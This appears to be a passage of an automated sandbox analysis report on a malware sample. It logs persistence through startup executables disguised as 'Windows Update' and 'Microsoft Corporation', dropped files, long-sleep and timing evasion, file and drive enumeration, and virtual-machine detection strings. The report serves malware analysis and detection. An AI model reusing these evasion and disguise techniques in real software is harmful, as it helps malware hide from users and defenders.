Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Memory allocated: 3550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Memory allocated: 4360000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Memory allocated: 3F60000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Memory allocated: DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Memory allocated: 3D50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Memory allocated: 3810000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Memory allocated: 33B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Memory allocated: 40A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Memory allocated: 33B0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Memory allocated: 2F30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Memory allocated: 3D80000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Memory allocated: 3220000 memory commit \| memory reserve \| memory write watch

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Window / User API: threadDelayed 391	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Window / User API: threadDelayed 409	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Window / User API: threadDelayed 3714	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Window / User API: threadDelayed 3709	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Window / User API: threadDelayed 592	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Window / User API: foregroundWindowGot 414	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe	Window / User API: foregroundWindowGot 422	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_1-1074

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe TID: 6448	Thread sleep count: 391 > 30	Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe TID: 1280	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3224	Thread sleep count: 409 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 2244	Thread sleep count: 3714 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 2244	Thread sleep time: -3714000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3300	Thread sleep count: 3709 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3300	Thread sleep time: -3709000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3796	Thread sleep count: 307 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3796	Thread sleep time: -30700s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3224	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3224	Thread sleep time: -34000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3300	Thread sleep count: 592 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3300	Thread sleep time: -592000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe TID: 4888	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe TID: 1916	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Code function: 1_2_00AE1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00AE1754h	1_2_00AE1718
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Code function: 15_2_00A31718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00A31754h	15_2_00A31718
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Code function: 22_2_00511718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00511754h	22_2_00511718

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Code function: 1_2_00AE29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	1_2_00AE29E2
Source: C:\Users\user\AppData\Local\Temp\server.exe	Code function: 4_2_009E9998 FindFirstFileW,	4_2_009E9998
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Code function: 14_2_009F9998 FindFirstFileW,	14_2_009F9998
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Code function: 15_2_00A329E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	15_2_00A329E2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Code function: 21_2_00979998 FindFirstFileW,	21_2_00979998
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	Code function: 22_2_005129E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,	22_2_005129E2

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe

Code function: 1_2_00AE2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,

1_2_00AE2B8C

Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe	File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\	Jump to behavior

Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2192046352.0000000001556000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\*
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.1.dr	Binary or memory string: vmci.sys
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.1.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2192046352.0000000001556000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x~T
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.1.dr	Binary or memory string: VMware Virtual USB Mouse
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.1.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp, server.exe, server.exe, 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmp, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmp, Microsoft Corporation.exe, Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A27000.00000040.00000001.01000000.0000000C.sdmp	Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.1.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RRqyIX.exe, 0000000F.00000003.2526814497.0000000000B5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
